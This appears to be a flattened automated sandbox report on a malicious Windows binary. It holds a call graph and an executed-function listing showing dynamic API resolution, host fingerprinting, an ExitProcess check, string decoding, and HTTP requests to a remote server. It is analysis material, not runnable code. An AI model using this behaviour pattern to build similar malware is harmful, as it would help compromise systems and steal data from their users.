36646 22ce0 36645->36646 36647 24610 2 API calls 36646->36647 36648 22cf9 36647->36648 36649 24610 2 API calls 36648->36649 36650 22d12 36649->36650 36651 24610 2 API calls 36650->36651 36652 22d2b 36651->36652 36653 24610 2 API calls 36652->36653 36654 22d44 36653->36654 36655 24610 2 API calls 36654->36655 36656 22d5d 36655->36656 36657 24610 2 API calls 36656->36657 36658 22d76 36657->36658 36659 24610 2 API calls 36658->36659 36660 22d8f 36659->36660 36661 24610 2 API calls 36660->36661 36662 22da8 36661->36662 36663 24610 2 API calls 36662->36663 36664 22dc1 36663->36664 36665 24610 2 API calls 36664->36665 36666 22dda 36665->36666 36667 24610 2 API calls 36666->36667 36668 22df3 36667->36668 36669 24610 2 API calls 36668->36669 36670 22e0c 36669->36670 36671 24610 2 API calls 36670->36671 36672 22e25 36671->36672 36673 24610 2 API calls 36672->36673 36674 22e3e 36673->36674 36675 24610 2 API calls 36674->36675 36676 22e57 36675->36676 36677 24610 2 API calls 36676->36677 36678 22e70 36677->36678 36679 24610 2 API calls 36678->36679 36680 22e89 36679->36680 36681 24610 2 API calls 36680->36681 36682 22ea2 36681->36682 36683 24610 2 API calls 36682->36683 36684 22ebb 36683->36684 36685 24610 2 API calls 36684->36685 36686 22ed4 36685->36686 36687 24610 2 API calls 36686->36687 36688 22eed 36687->36688 36689 24610 2 API calls 36688->36689 36690 22f06 36689->36690 36691 24610 2 API calls 36690->36691 36692 22f1f 36691->36692 36693 24610 2 API calls 36692->36693 36694 22f38 36693->36694 36695 24610 2 API calls 36694->36695 36696 22f51 36695->36696 36697 24610 2 API calls 36696->36697 36698 22f6a 36697->36698 36699 24610 2 API calls 36698->36699 36700 22f83 36699->36700 36701 24610 2 API calls 36700->36701 36702 22f9c 36701->36702 36703 24610 2 API calls 36702->36703 36704 22fb5 36703->36704 36705 24610 2 API calls 36704->36705 36706 22fce 36705->36706 36707 24610 2 API calls 36706->36707 36708 22fe7 36707->36708 36709 24610 2 API calls 36708->36709 36710 23000 36709->36710 36711 24610 2 API calls 36710->36711 36712 23019 36711->36712 36713 24610 2 API calls 36712->36713 36714 23032 36713->36714 36715 24610 2 API calls 36714->36715 36716 2304b 36715->36716 36717 24610 2 API calls 36716->36717 36718 23064 36717->36718 36719 24610 2 API calls 36718->36719 36720 2307d 36719->36720 36721 24610 2 API calls 36720->36721 36722 23096 36721->36722 36723 24610 2 API calls 36722->36723 36724 230af 36723->36724 36725 24610 2 API calls 36724->36725 36726 230c8 36725->36726 36727 24610 2 API calls 36726->36727 36728 230e1 36727->36728 36729 24610 2 API calls 36728->36729 36730 230fa 36729->36730 36731 24610 2 API calls 36730->36731 36732 23113 36731->36732 36733 24610 2 API calls 36732->36733 36734 2312c 36733->36734 36735 24610 2 API calls 36734->36735 36736 23145 36735->36736 36737 24610 2 API calls 36736->36737 36738 2315e 36737->36738 36739 24610 2 API calls 36738->36739 36740 23177 36739->36740 36741 24610 2 API calls 36740->36741 36742 23190 36741->36742 36743 24610 2 API calls 36742->36743 36744 231a9 36743->36744 36745 24610 2 API calls 36744->36745 36746 231c2 36745->36746 36747 24610 2 API calls 36746->36747 36748 231db 36747->36748 36749 24610 2 API calls 36748->36749 36750 231f4 36749->36750 36751 24610 2 API calls 36750->36751 36752 2320d 36751->36752 36753 24610 2 API calls 36752->36753 36754 23226 36753->36754 36755 24610 2 API calls 36754->36755 36756 2323f 36755->36756 36757 24610 2 API calls 36756->36757 36758 23258 36757->36758 36759 24610 2 API calls 36758->36759 36760 23271 36759->36760 36761 24610 2 API calls 36760->36761 36762 2328a 36761->36762 36763 24610 2 API calls 36762->36763 36764 232a3 36763->36764 36765 24610 2 API calls 36764->36765 36766 232bc 36765->36766 36767 24610 2 API calls 36766->36767 36768 232d5 36767->36768 36769 24610 2 API calls 36768->36769 36770 232ee 36769->36770 36771 24610 2 API calls 36770->36771 36772 23307 36771->36772 36773 24610 2 API calls 36772->36773 36774 23320 36773->36774 36775 24610 2 API calls 36774->36775 36776 23339 36775->36776 36777 24610 2 API calls 36776->36777 36778 23352 36777->36778 36779 24610 2 API calls 36778->36779 36780 2336b 36779->36780 36781 24610 2 API calls 36780->36781 36782 23384 36781->36782 36783 24610 2 API calls 36782->36783 36784 2339d 36783->36784 36785 24610 2 API calls 36784->36785 36786 233b6 36785->36786 36787 24610 2 API calls 36786->36787 36788 233cf 36787->36788 36789 24610 2 API calls 36788->36789 36790 233e8 36789->36790 36791 24610 2 API calls 36790->36791 36792 23401 36791->36792 36793 24610 2 API calls 36792->36793 36794 2341a 36793->36794 36795 24610 2 API calls 36794->36795 36796 23433 36795->36796 36797 24610 2 API calls 36796->36797 36798 2344c 36797->36798 36799 24610 2 API calls 36798->36799 36800 23465 36799->36800 36801 24610 2 API calls 36800->36801 36802 2347e 36801->36802 36803 24610 2 API calls 36802->36803 36804 23497 36803->36804 36805 24610 2 API calls 36804->36805 36806 234b0 36805->36806 36807 24610 2 API calls 36806->36807 36808 234c9 36807->36808 36809 24610 2 API calls 36808->36809 36810 234e2 36809->36810 36811 24610 2 API calls 36810->36811 36812 234fb 36811->36812 36813 24610 2 API calls 36812->36813 36814 23514 36813->36814 36815 24610 2 API calls 36814->36815 36816 2352d 36815->36816 36817 24610 2 API calls 36816->36817 36818 23546 36817->36818 36819 24610 2 API calls 36818->36819 36820 2355f 36819->36820 36821 24610 2 API calls 36820->36821 36822 23578 36821->36822 36823 24610 2 API calls 36822->36823 36824 23591 36823->36824 36825 24610 2 API calls 36824->36825 36826 235aa 36825->36826 36827 24610 2 API calls 36826->36827 36828 235c3 36827->36828 36829 24610 2 API calls 36828->36829 36830 235dc 36829->36830 36831 24610 2 API calls 36830->36831 36832 235f5 36831->36832 36833 24610 2 API calls 36832->36833 36834 2360e 36833->36834 36835 24610 2 API calls 36834->36835 36836 23627 36835->36836 36837 24610 2 API calls 36836->36837 36838 23640 36837->36838 36839 24610 2 API calls 36838->36839 36840 23659 36839->36840 36841 24610 2 API calls 36840->36841 36842 23672 36841->36842 36843 24610 2 API calls 36842->36843 36844 2368b 36843->36844 36845 24610 2 API calls 36844->36845 36846 236a4 36845->36846 36847 24610 2 API calls 36846->36847 36848 236bd 36847->36848 36849 24610 2 API calls 36848->36849 36850 236d6 36849->36850 36851 24610 2 API calls 36850->36851 36852 236ef 36851->36852 36853 24610 2 API calls 36852->36853 36854 23708 36853->36854 36855 24610 2 API calls 36854->36855 36856 23721 36855->36856 36857 24610 2 API calls 36856->36857 36858 2373a 36857->36858 36859 24610 2 API calls 36858->36859 36860 23753 36859->36860 36861 24610 2 API calls 36860->36861 36862 2376c 36861->36862 36863 24610 2 API calls 36862->36863 36864 23785 36863->36864 36865 24610 2 API calls 36864->36865 36866 2379e 36865->36866 36867 24610 2 API calls 36866->36867 36868 237b7 36867->36868 36869 24610 2 API calls 36868->36869 36870 237d0 36869->36870 36871 24610 2 API calls 36870->36871 36872 237e9 36871->36872 36873 24610 2 API calls 36872->36873 36874 23802 36873->36874 36875 24610 2 API calls 36874->36875 36876 2381b 36875->36876 36877 24610 2 API calls 36876->36877 36878 23834 36877->36878 36879 24610 2 API calls 36878->36879 36880 2384d 36879->36880 36881 24610 2 API calls 36880->36881 36882 23866 36881->36882 36883 24610 2 API calls 36882->36883 36884 2387f 36883->36884 36885 24610 2 API calls 36884->36885 36886 23898 36885->36886 36887 24610 2 API calls 36886->36887 36888 238b1 36887->36888 36889 24610 2 API calls 36888->36889 36890 238ca 36889->36890 36891 24610 2 API calls 36890->36891 36892 238e3 36891->36892 36893 24610 2 API calls 36892->36893 36894 238fc 36893->36894 36895 24610 2 API calls 36894->36895 36896 23915 36895->36896 36897 24610 2 API calls 36896->36897 36898 2392e 36897->36898 36899 24610 2 API calls 36898->36899 36900 23947 36899->36900 36901 24610 2 API calls 36900->36901 36902 23960 36901->36902 36903 24610 2 API calls 36902->36903 36904 23979 36903->36904 36905 24610 2 API calls 36904->36905 36906 23992 36905->36906 36907 24610 2 API calls 36906->36907 36908 239ab 36907->36908 36909 24610 2 API calls 36908->36909 36910 239c4 36909->36910 36911 24610 2 API calls 36910->36911 36912 239dd 36911->36912 36913 24610 2 API calls 36912->36913 36914 239f6 36913->36914 36915 24610 2 API calls 36914->36915 36916 23a0f 36915->36916 36917 24610 2 API calls 36916->36917 36918 23a28 36917->36918 36919 24610 2 API calls 36918->36919 36920 23a41 36919->36920 36921 24610 2 API calls 36920->36921 36922 23a5a 36921->36922 36923 24610 2 API calls 36922->36923 36924 23a73 36923->36924 36925 24610 2 API calls 36924->36925 36926 23a8c 36925->36926 36927 24610 2 API calls 36926->36927 36928 23aa5 36927->36928 36929 24610 2 API calls 36928->36929 36930 23abe 36929->36930 36931 24610 2 API calls 36930->36931 36932 23ad7 36931->36932 36933 24610 2 API calls 36932->36933 36934 23af0 36933->36934 36935 24610 2 API calls 36934->36935 36936 23b09 36935->36936 36937 24610 2 API calls 36936->36937 36938 23b22 36937->36938 36939 24610 2 API calls 36938->36939 36940 23b3b 36939->36940 36941 24610 2 API calls 36940->36941 36942 23b54 36941->36942 36943 24610 2 API calls 36942->36943 36944 23b6d 36943->36944 36945 24610 2 API calls 36944->36945 36946 23b86 36945->36946 36947 24610 2 API calls 36946->36947 36948 23b9f 36947->36948 36949 24610 2 API calls 36948->36949 36950 23bb8 36949->36950 36951 24610 2 API calls 36950->36951 36952 23bd1 36951->36952 36953 24610 2 API calls 36952->36953 36954 23bea 36953->36954 36955 24610 2 API calls 36954->36955 36956 23c03 36955->36956 36957 24610 2 API calls 36956->36957 36958 23c1c 36957->36958 36959 24610 2 API calls 36958->36959 36960 23c35 36959->36960 36961 24610 2 API calls 36960->36961 36962 23c4e 36961->36962 36963 24610 2 API calls 36962->36963 36964 23c67 36963->36964 36965 24610 2 API calls 36964->36965 36966 23c80 36965->36966 36967 24610 2 API calls 36966->36967 36968 23c99 36967->36968 36969 24610 2 API calls 36968->36969 36970 23cb2 36969->36970 36971 24610 2 API calls 36970->36971 36972 23ccb 36971->36972 36973 24610 2 API calls 36972->36973 36974 23ce4 36973->36974 36975 24610 2 API calls 36974->36975 36976 23cfd 36975->36976 36977 24610 2 API calls 36976->36977 36978 23d16 36977->36978 36979 24610 2 API calls 36978->36979 36980 23d2f 36979->36980 36981 24610 2 API calls 36980->36981 36982 23d48 36981->36982 36983 24610 2 API calls 36982->36983 36984 23d61 36983->36984 36985 24610 2 API calls 36984->36985 36986 23d7a 36985->36986 36987 24610 2 API calls 36986->36987 36988 23d93 36987->36988 36989 24610 2 API calls 36988->36989 36990 23dac 36989->36990 36991 24610 2 API calls 36990->36991 36992 23dc5 36991->36992 36993 24610 2 API calls 36992->36993 36994 23dde 36993->36994 36995 24610 2 API calls 36994->36995 36996 23df7 36995->36996 36997 24610 2 API calls 36996->36997 36998 23e10 36997->36998 36999 24610 2 API calls 36998->36999 37000 23e29 36999->37000 37001 24610 2 API calls 37000->37001 37002 23e42 37001->37002 37003 24610 2 API calls 37002->37003 37004 23e5b 37003->37004 37005 24610 2 API calls 37004->37005 37006 23e74 37005->37006 37007 24610 2 API calls 37006->37007 37008 23e8d 37007->37008 37009 24610 2 API calls 37008->37009 37010 23ea6 37009->37010 37011 24610 2 API calls 37010->37011 37012 23ebf 37011->37012 37013 24610 2 API calls 37012->37013 37014 23ed8 37013->37014 37015 24610 2 API calls 37014->37015 37016 23ef1 37015->37016 37017 24610 2 API calls 37016->37017 37018 23f0a 37017->37018 37019 24610 2 API calls 37018->37019 37020 23f23 37019->37020 37021 24610 2 API calls 37020->37021 37022 23f3c 37021->37022 37023 24610 2 API calls 37022->37023 37024 23f55 37023->37024 37025 24610 2 API calls 37024->37025 37026 23f6e 37025->37026 37027 24610 2 API calls 37026->37027 37028 23f87 37027->37028 37029 24610 2 API calls 37028->37029 37030 23fa0 37029->37030 37031 24610 2 API calls 37030->37031 37032 23fb9 37031->37032 37033 24610 2 API calls 37032->37033 37034 23fd2 37033->37034 37035 24610 2 API calls 37034->37035 37036 23feb 37035->37036 37037 24610 2 API calls 37036->37037 37038 24004 37037->37038 37039 24610 2 API calls 37038->37039 37040 2401d 37039->37040 37041 24610 2 API calls 37040->37041 37042 24036 37041->37042 37043 24610 2 API calls 37042->37043 37044 2404f 37043->37044 37045 24610 2 API calls 37044->37045 37046 24068 37045->37046 37047 24610 2 API calls 37046->37047 37048 24081 37047->37048 37049 24610 2 API calls 37048->37049 37050 2409a 37049->37050 37051 24610 2 API calls 37050->37051 37052 240b3 37051->37052 37053 24610 2 API calls 37052->37053 37054 240cc 37053->37054 37055 24610 2 API calls 37054->37055 37056 240e5 37055->37056 37057 24610 2 API calls 37056->37057 37058 240fe 37057->37058 37059 24610 2 API calls 37058->37059 37060 24117 37059->37060 37061 24610 2 API calls 37060->37061 37062 24130 37061->37062 37063 24610 2 API calls 37062->37063 37064 24149 37063->37064 37065 24610 2 API calls 37064->37065 37066 24162 37065->37066 37067 24610 2 API calls 37066->37067 37068 2417b 37067->37068 37069 24610 2 API calls 37068->37069 37070 24194 37069->37070 37071 24610 2 API calls 37070->37071 37072 241ad 37071->37072 37073 24610 2 API calls 37072->37073 37074 241c6 37073->37074 37075 24610 2 API calls 37074->37075 37076 241df 37075->37076 37077 24610 2 API calls 37076->37077 37078 241f8 37077->37078 37079 24610 2 API calls 37078->37079 37080 24211 37079->37080 37081 24610 2 API calls 37080->37081 37082 2422a 37081->37082 37083 24610 2 API calls 37082->37083 37084 24243 37083->37084 37085 24610 2 API calls 37084->37085 37086 2425c 37085->37086 37087 24610 2 API calls 37086->37087 37088 24275 37087->37088 37089 24610 2 API calls 37088->37089 37090 2428e 37089->37090 37091 24610 2 API calls 37090->37091 37092 242a7 37091->37092 37093 24610 2 API calls 37092->37093 37094 242c0 37093->37094 37095 24610 2 API calls 37094->37095 37096 242d9 37095->37096 37097 24610 2 API calls 37096->37097 37098 242f2 37097->37098 37099 24610 2 API calls 37098->37099 37100 2430b 37099->37100 37101 24610 2 API calls 37100->37101 37102 24324 37101->37102 37103 24610 2 API calls 37102->37103 37104 2433d 37103->37104 37105 24610 2 API calls 37104->37105 37106 24356 37105->37106 37107 24610 2 API calls 37106->37107 37108 2436f 37107->37108 37109 24610 2 API calls 37108->37109 37110 24388 37109->37110 37111 24610 2 API calls 37110->37111 37112 243a1 37111->37112 37113 24610 2 API calls 37112->37113 37114 243ba 37113->37114 37115 24610 2 API calls 37114->37115 37116 243d3 37115->37116 37117 24610 2 API calls 37116->37117 37118 243ec 37117->37118 37119 24610 2 API calls 37118->37119 37120 24405 37119->37120 37121 24610 2 API calls 37120->37121 37122 2441e 37121->37122 37123 24610 2 API calls 37122->37123 37124 24437 37123->37124 37125 24610 2 API calls 37124->37125 37126 24450 37125->37126 37127 24610 2 API calls 37126->37127 37128 24469 37127->37128 37129 24610 2 API calls 37128->37129 37130 24482 37129->37130 37131 24610 2 API calls 37130->37131 37132 2449b 37131->37132 37133 24610 2 API calls 37132->37133 37134 244b4 37133->37134 37135 24610 2 API calls 37134->37135 37136 244cd 37135->37136 37137 24610 2 API calls 37136->37137 37138 244e6 37137->37138 37139 24610 2 API calls 37138->37139 37140 244ff 37139->37140 37141 24610 2 API calls 37140->37141 37142 24518 37141->37142 37143 24610 2 API calls 37142->37143 37144 24531 37143->37144 37145 24610 2 API calls 37144->37145 37146 2454a 37145->37146 37147 24610 2 API calls 37146->37147 37148 24563 37147->37148 37149 24610 2 API calls 37148->37149 37150 2457c 37149->37150 37151 24610 2 API calls 37150->37151 37152 24595 37151->37152 37153 24610 2 API calls 37152->37153 37154 245ae 37153->37154 37155 24610 2 API calls 37154->37155 37156 245c7 37155->37156 37157 24610 2 API calls 37156->37157 37158 245e0 37157->37158 37159 24610 2 API calls 37158->37159 37160 245f9 37159->37160 37161 39f20 37160->37161 37162 39f30 43 API calls 37161->37162 37163 3a346 8 API calls 37161->37163 37162->37163 37164 3a456 37163->37164 37165 3a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37163->37165 37166 3a463 8 API calls 37164->37166 37167 3a526 37164->37167 37165->37164 37166->37167 37168 3a5a8 37167->37168 37169 3a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37167->37169 37170 3a647 37168->37170 37171 3a5b5 6 API calls 37168->37171 37169->37168 37172 3a654 9 API calls 37170->37172 37173 3a72f 37170->37173 37171->37170 37172->37173 37174 3a7b2 37173->37174 37175 3a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37173->37175 37176 3a7bb GetProcAddress GetProcAddress 37174->37176 37177 3a7ec 37174->37177 37175->37174 37176->37177 37178 3a825 37177->37178 37179 3a7f5 GetProcAddress GetProcAddress 37177->37179 37180 3a922 37178->37180 37181 3a832 10 API calls 37178->37181 37179->37178 37182 3a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37180->37182 37183 3a98d 37180->37183 37181->37180 37182->37183 37184 3a996 GetProcAddress 37183->37184 37185 3a9ae 37183->37185 37184->37185 37186 3a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37185->37186 37187 35ef3 37185->37187 37186->37187 37188 21590 37187->37188 37458 216b0 37188->37458 37191 3aab0 lstrcpy 37192 215b5 37191->37192 37193 3aab0 lstrcpy 37192->37193 37194 215c7 37193->37194 37195 3aab0 lstrcpy 37194->37195 37196 215d9 37195->37196 37197 3aab0 lstrcpy 37196->37197 37198 21663 37197->37198 37199 35760 37198->37199 37200 35771 37199->37200 37201 3ab30 2 API calls 37200->37201 37202 3577e 37201->37202 37203 3ab30 2 API calls 37202->37203 37204 3578b 37203->37204 37205 3ab30 2 API calls 37204->37205 37206 35798 37205->37206 37207 3aa50 lstrcpy 37206->37207 37208 357a5 37207->37208 37209 3aa50 lstrcpy 37208->37209 37210 357b2 37209->37210 37211 3aa50 lstrcpy 37210->37211 37212 357bf 37211->37212 37213 3aa50 lstrcpy 37212->37213 37251 357cc 37213->37251 37214 3ab30 lstrlen lstrcpy 37214->37251 37215 3abb0 lstrcpy 37215->37251 37216 35893 StrCmpCA 37216->37251 37217 358f0 StrCmpCA 37218 35a2c 37217->37218 37217->37251 37219 3abb0 lstrcpy 37218->37219 37220 35a38 37219->37220 37221 3ab30 2 API calls 37220->37221 37223 35a46 37221->37223 37222 35440 20 API calls 37222->37251 37225 3ab30 2 API calls 37223->37225 37224 35aa6 StrCmpCA 37226 35be1 37224->37226 37224->37251 37228 35a55 37225->37228 37227 3abb0 lstrcpy 37226->37227 37229 35bed 37227->37229 37230 216b0 lstrcpy 37228->37230 37231 3ab30 2 API calls 37229->37231 37250 35a61 37230->37250 37234 35bfb 37231->37234 37232 3aa50 lstrcpy 37232->37251 37233 35510 25 API calls 37233->37251 37238 3ab30 2 API calls 37234->37238 37235 35c5b StrCmpCA 37236 35c66 Sleep 37235->37236 37237 35c78 37235->37237 37236->37251 37239 3abb0 lstrcpy 37237->37239 37240 35c0a 37238->37240 37241 35c84 37239->37241 37242 216b0 lstrcpy 37240->37242 37243 3ab30 2 API calls 37241->37243 37242->37250 37244 35c93 37243->37244 37245 3ab30 2 API calls 37244->37245 37246 35ca2 37245->37246 37248 216b0 lstrcpy 37246->37248 37247 359da StrCmpCA 37247->37251 37248->37250 37249 3aab0 lstrcpy 37249->37251 37250->36306 37251->37214 37251->37215 37251->37216 37251->37217 37251->37222 37251->37224 37251->37232 37251->37233 37251->37235 37251->37247 37251->37249 37252 35b8f StrCmpCA 37251->37252 37253 21590 lstrcpy 37251->37253 37252->37251 37253->37251 37255 376e3 GetVolumeInformationA 37254->37255 37256 376dc 37254->37256 37257 37721 37255->37257 37256->37255 37258 3778c GetProcessHeap RtlAllocateHeap 37257->37258 37259 377a9 37258->37259 37260 377b8 wsprintfA 37258->37260 37261 3aa50 lstrcpy 37259->37261 37262 3aa50 lstrcpy 37260->37262 37263 35ff7 37261->37263 37262->37263 37263->36327 37265 3aab0 lstrcpy 37264->37265 37266 248e9 37265->37266 37467 24800 37266->37467 37268 248f5 37269 3aa50 lstrcpy 37268->37269 37270 24927 37269->37270 37271 3aa50 lstrcpy 37270->37271 37272 24934 37271->37272 37273 3aa50 lstrcpy 37272->37273 37274 24941 37273->37274 37275 3aa50 lstrcpy 37274->37275 37276 2494e 37275->37276 37277 3aa50 lstrcpy 37276->37277 37278 2495b InternetOpenA StrCmpCA 37277->37278 37279 24994 37278->37279 37280 24f1b InternetCloseHandle 37279->37280 37473 38cf0 37279->37473 37282 24f38 37280->37282 37488 2a210 CryptStringToBinaryA 37282->37488 37283 249b3 37481 3ac30 37283->37481 37286 249c6 37288 3abb0 lstrcpy 37286->37288 37293 249cf 37288->37293 37289 3ab30 2 API calls 37290 24f55 37289->37290 37292 3acc0 4 API calls 37290->37292 37291 24f77 codecvt 37295 3aab0 lstrcpy 37291->37295 37294 24f6b 37292->37294 37297 3acc0 4 API calls 37293->37297 37296 3abb0 lstrcpy 37294->37296 37308 24fa7 37295->37308 37296->37291 37298 249f9 37297->37298 37299 3abb0 lstrcpy 37298->37299 37300 24a02 37299->37300 37301 3acc0 4 API calls 37300->37301 37302 24a21 37301->37302 37303 3abb0 lstrcpy 37302->37303 37304 24a2a 37303->37304 37305 3ac30 3 API calls 37304->37305 37306 24a48 37305->37306 37307 3abb0 lstrcpy 37306->37307 37309 24a51 37307->37309 37308->36330 37310 3acc0 4 API calls 37309->37310 37311 24a70 37310->37311 37312 3abb0 lstrcpy 37311->37312 37313 24a79 37312->37313 37314 3acc0 4 API calls 37313->37314 37315 24a98 37314->37315 37316 3abb0 lstrcpy 37315->37316 37317 24aa1 37316->37317 37318 3acc0 4 API calls 37317->37318 37319 24acd 37318->37319 37320 3ac30 3 API calls 37319->37320 37321 24ad4 37320->37321 37322 3abb0 lstrcpy 37321->37322 37323 24add 37322->37323 37324 24af3 InternetConnectA 37323->37324 37324->37280 37325 24b23 HttpOpenRequestA 37324->37325 37327 24b78 37325->37327 37328 24f0e InternetCloseHandle 37325->37328 37329 3acc0 4 API calls 37327->37329 37328->37280 37330 24b8c 37329->37330 37331 3abb0 lstrcpy 37330->37331 37332 24b95 37331->37332 37333 3ac30 3 API calls 37332->37333 37334 24bb3 37333->37334 37335 3abb0 lstrcpy 37334->37335 37336 24bbc 37335->37336 37337 3acc0 4 API calls 37336->37337 37338 24bdb 37337->37338 37339 3abb0 lstrcpy 37338->37339 37340 24be4 37339->37340 37341 3acc0 4 API calls 37340->37341 37342 24c05 37341->37342 37343 3abb0 lstrcpy 37342->37343 37344 24c0e 37343->37344 37345 3acc0 4 API calls 37344->37345 37346 24c2e 37345->37346 37347 3abb0 lstrcpy 37346->37347 37348 24c37 37347->37348 37349 3acc0 4 API calls 37348->37349 37350 24c56 37349->37350 37351 3abb0 lstrcpy 37350->37351 37352 24c5f 37351->37352 37353 3ac30 3 API calls 37352->37353 37354 24c7d 37353->37354 37355 3abb0 lstrcpy 37354->37355 37356 24c86 37355->37356 37357 3acc0 4 API calls 37356->37357 37358 24ca5 37357->37358 37359 3abb0 lstrcpy 37358->37359 37360 24cae 37359->37360 37361 3acc0 4 API calls 37360->37361 37362 24ccd 37361->37362 37363 3abb0 lstrcpy 37362->37363 37364 24cd6 37363->37364 37365 3ac30 3 API calls 37364->37365 37366 24cf4 37365->37366 37367 3abb0 lstrcpy 37366->37367 37368 24cfd 37367->37368 37369 3acc0 4 API calls 37368->37369 37370 24d1c 37369->37370 37371 3abb0 lstrcpy 37370->37371 37372 24d25 37371->37372 37373 3acc0 4 API calls 37372->37373 37374 24d46 37373->37374 37375 3abb0 lstrcpy 37374->37375 37376 24d4f 37375->37376 37377 3acc0 4 API calls 37376->37377 37378 24d6f 37377->37378 37379 3abb0 lstrcpy 37378->37379 37380 24d78 37379->37380 37381 3acc0 4 API calls 37380->37381 37382 24d97 37381->37382 37383 3abb0 lstrcpy 37382->37383 37384 24da0 37383->37384 37385 3ac30 3 API calls 37384->37385 37386 24dbe 37385->37386 37387 3abb0 lstrcpy 37386->37387 37388 24dc7 37387->37388 37389 3aa50 lstrcpy 37388->37389 37390 24de2 37389->37390 37391 3ac30 3 API calls 37390->37391 37392 24e03 37391->37392 37393 3ac30 3 API calls 37392->37393 37394 24e0a 37393->37394 37395 3abb0 lstrcpy 37394->37395 37396 24e16 37395->37396 37397 24e37 lstrlen 37396->37397 37398 24e4a 37397->37398 37399 24e53 lstrlen 37398->37399 37487 3ade0 37399->37487 37401 24e63 HttpSendRequestA 37402 24e82 InternetReadFile 37401->37402 37403 24eb7 InternetCloseHandle 37402->37403 37408 24eae 37402->37408 37405 3ab10 37403->37405 37405->37328 37406 3acc0 4 API calls 37406->37408 37407 3abb0 lstrcpy 37407->37408 37408->37402 37408->37403 37408->37406 37408->37407 37494 3ade0 37409->37494 37411 31a14 StrCmpCA 37412 31a1f ExitProcess 37411->37412 37424 31a27 37411->37424 37413 31c12 37413->36332 37414 31b63 StrCmpCA 37414->37424 37415 31b82 StrCmpCA 37415->37424 37416 31b41 StrCmpCA 37416->37424 37417 31ba1 StrCmpCA 37417->37424 37418 31bc0 StrCmpCA 37418->37424 37419 31acf StrCmpCA 37419->37424 37420 31aad StrCmpCA 37420->37424 37421 31b1f StrCmpCA 37421->37424 37422 31afd StrCmpCA 37422->37424 37423 3ab30 lstrlen lstrcpy 37423->37424 37424->37413 37424->37414 37424->37415 37424->37416 37424->37417 37424->37418 37424->37419 37424->37420 37424->37421 37424->37422 37424->37423 37425->36338 37426->36340 37427->36346 37428->36348 37429->36354 37430->36356 37431->36360 37432->36364 37433->36368 37434->36374 37435->36376 37436->36380 37437->36394 37438->36398 37439->36397 37440->36393 37441->36397 37442->36415 37443->36400 37444->36402 37445->36406 37446->36411 37447->36412 37448->36418 37449->36425 37450->36427 37451->36450 37452->36454 37453->36455 37454->36451 37455->36455 37456->36464 37459 3aab0 lstrcpy 37458->37459 37460 216c3 37459->37460 37461 3aab0 lstrcpy 37460->37461 37462 216d5 37461->37462 37463 3aab0 lstrcpy 37462->37463 37464 216e7 37463->37464 37465 3aab0 lstrcpy 37464->37465 37466 215a3 37465->37466 37466->37191 37468 24816 37467->37468 37469 24888 lstrlen 37468->37469 37493 3ade0 37469->37493 37471 24898 InternetCrackUrlA 37472 248b7 37471->37472 37472->37268 37474 3aa50 lstrcpy 37473->37474 37475 38d04 37474->37475 37476 3aa50 lstrcpy 37475->37476 37477 38d12 GetSystemTime 37476->37477 37478 38d29 37477->37478 37479 3aab0 lstrcpy 37478->37479 37480 38d8c 37479->37480 37480->37283 37482 3ac41 37481->37482 37483 3ac98 37482->37483 37486 3ac78 lstrcpy lstrcat 37482->37486 37484 3aab0 lstrcpy 37483->37484 37485 3aca4 37484->37485 37485->37286 37486->37483 37487->37401 37489 24f3e 37488->37489 37490 2a249 LocalAlloc 37488->37490 37489->37289 37489->37291 37490->37489 37491 2a264 CryptStringToBinaryA 37490->37491 37491->37489 37492 2a289 LocalFree 37491->37492 37492->37489 37493->37471 37494->37411

                          Executed Functions

                          Function 00039BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 39bb0-39bc4 call 39aa0 663 39de3-39e42 LoadLibraryA * 5 660->663 664 39bca-39dde call 39ad0 GetProcAddress * 21 660->664 665 39e44-39e58 GetProcAddress 663->665 666 39e5d-39e64 663->666 664->663 665->666 668 39e96-39e9d 666->668 669 39e66-39e91 GetProcAddress * 2 666->669 671 39eb8-39ebf 668->671 672 39e9f-39eb3 GetProcAddress 668->672 669->668 673 39ec1-39ed4 GetProcAddress 671->673 674 39ed9-39ee0 671->674 672->671 673->674 675 39ee2-39f0c GetProcAddress * 2 674->675 676 39f11-39f12 674->676 675->676
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,00FD2248), ref: 00039BF1
                          • GetProcAddress.KERNEL32(74DD0000,00FD2368), ref: 00039C0A
                          • GetProcAddress.KERNEL32(74DD0000,00FD2488), ref: 00039C22
                          • GetProcAddress.KERNEL32(74DD0000,00FD2260), ref: 00039C3A
                          • GetProcAddress.KERNEL32(74DD0000,00FD2338), ref: 00039C53
                          • GetProcAddress.KERNEL32(74DD0000,00FD9098), ref: 00039C6B
                          • GetProcAddress.KERNEL32(74DD0000,00FC5A70), ref: 00039C83
                          • GetProcAddress.KERNEL32(74DD0000,00FC5790), ref: 00039C9C
                          • GetProcAddress.KERNEL32(74DD0000,00FD2410), ref: 00039CB4
                          • GetProcAddress.KERNEL32(74DD0000,00FD22D8), ref: 00039CCC
                          • GetProcAddress.KERNEL32(74DD0000,00FD2308), ref: 00039CE5
                          • GetProcAddress.KERNEL32(74DD0000,00FD2440), ref: 00039CFD
                          • GetProcAddress.KERNEL32(74DD0000,00FC5950), ref: 00039D15
                          • GetProcAddress.KERNEL32(74DD0000,00FD23B0), ref: 00039D2E
                          • GetProcAddress.KERNEL32(74DD0000,00FD23C8), ref: 00039D46
                          • GetProcAddress.KERNEL32(74DD0000,00FC58F0), ref: 00039D5E
                          • GetProcAddress.KERNEL32(74DD0000,00FD24A0), ref: 00039D77
                          • GetProcAddress.KERNEL32(74DD0000,00FD24B8), ref: 00039D8F
                          • GetProcAddress.KERNEL32(74DD0000,00FC56B0), ref: 00039DA7
                          • GetProcAddress.KERNEL32(74DD0000,00FD24D0), ref: 00039DC0
                          • GetProcAddress.KERNEL32(74DD0000,00FC56D0), ref: 00039DD8
                          • LoadLibraryA.KERNEL32(00FD2578,?,00036CA0), ref: 00039DEA
                          • LoadLibraryA.KERNEL32(00FD25D8,?,00036CA0), ref: 00039DFB
                          • LoadLibraryA.KERNEL32(00FD2590,?,00036CA0), ref: 00039E0D
